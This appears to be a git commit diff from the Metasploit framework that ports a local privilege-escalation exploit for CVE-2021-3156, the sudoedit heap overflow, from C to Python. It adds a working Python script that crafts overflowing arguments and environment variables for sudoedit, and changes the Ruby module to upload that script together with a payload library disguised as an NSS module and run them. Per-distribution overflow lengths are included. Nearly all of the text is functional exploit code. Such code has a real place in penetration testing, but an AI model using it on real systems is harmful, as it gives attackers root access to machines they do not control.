Port sudoedit exploit to Python
It's assumed that Python is more likely to be present on the target system than gcc, so is better as a dependency.
This commit is contained in:
parent
78295b654b
commit
fcd17ed3b1
|
@ -0,0 +1,26 @@
|
|||
import sys
|
||||
import os
|
||||
from ctypes import cdll, c_char_p, POINTER
|
||||
|
||||
libc = cdll.LoadLibrary("libc.so.6")
|
||||
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
|
||||
|
||||
smash_len_a = int(sys.argv[1])
|
||||
smash_len_b = int(sys.argv[2])
|
||||
null_stomp_len = int(sys.argv[3])
|
||||
lc_all_len = int(sys.argv[4])
|
||||
so_overwrite = sys.argv[5]
|
||||
working_dir = sys.argv[6]
|
||||
|
||||
argv = [b'sudoedit', b'-s', b'#' * smash_len_a + b'\\', b'\\', b'#' * smash_len_b + b'\\', None]
|
||||
cmd = b'/usr/bin/sudoedit'
|
||||
env = [b'\\'] * null_stomp_len
|
||||
env.append(so_overwrite.encode('latin-1'))
|
||||
env.append(b'LC_ALL=C.UTF-8@' + (b'C' * lc_all_len))
|
||||
env.append(None)
|
||||
|
||||
cargv = (c_char_p * len(argv))(*argv)
|
||||
cenvp = (c_char_p * len(env))(*env)
|
||||
|
||||
os.chdir(working_dir)
|
||||
libc.execve(cmd, cargv, cenvp)
|
|
@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Unix
|
||||
include Msf::Post::Linux::Compile
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
@ -47,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
|
||||
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
|
||||
[ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 19\.04/ } ],
|
||||
[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 18\.04/ } ],
|
||||
[ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { lengths: [ 64, 49, 60, 214 ], version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
|
||||
|
@ -126,6 +125,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
selected_target
|
||||
end
|
||||
|
||||
def find_exec_program
|
||||
return 'python' if command_exists?('python')
|
||||
return 'python3' if command_exists?('python3')
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
if target.name == 'Manual'
|
||||
fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
|
||||
|
@ -134,19 +139,25 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
lengths = (target.name == 'Automatic' ? get_automatic_target : target)[:lengths].join(' ')
|
||||
end
|
||||
|
||||
fail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc?
|
||||
python_binary = find_exec_program
|
||||
|
||||
fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
|
||||
|
||||
vprint_status("Using '#{python_binary}' to run exploit")
|
||||
|
||||
path = datastore['WritableDir']
|
||||
|
||||
exe_file_name = rand_text_alphanumeric(5..10)
|
||||
overwrite_path = rand_overwrite_path # the part that is overwritten in memory to construct the full path
|
||||
lib_file_path = "libnss_#{overwrite_path} .so.2" # the full path
|
||||
|
||||
upload_and_compile("#{path}/#{exe_file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
|
||||
register_files_for_cleanup("#{path}/#{exe_file_name}")
|
||||
python_script_name = rand_text_alphanumeric(5..10) + '.py'
|
||||
upload("#{path}/#{python_script_name}", exploit_data('CVE-2021-3156', 'exploit.py'))
|
||||
register_files_for_cleanup("#{path}/#{python_script_name}")
|
||||
mkdir("#{path}/#{lib_file_path.rpartition('/').first}")
|
||||
upload("#{path}/#{lib_file_path}", generate_payload_dll)
|
||||
cmd_exec("'#{path}/#{exe_file_name}' #{lengths} '#{overwrite_path}'")
|
||||
cmd = "#{python_binary} #{path}/#{python_script_name} #{lengths} #{overwrite_path} #{path}"
|
||||
vprint_status("Running #{cmd}")
|
||||
cmd_exec(cmd)
|
||||
end
|
||||
|
||||
def rand_overwrite_path
|
||||
|
|
Loading…
Reference in New Issue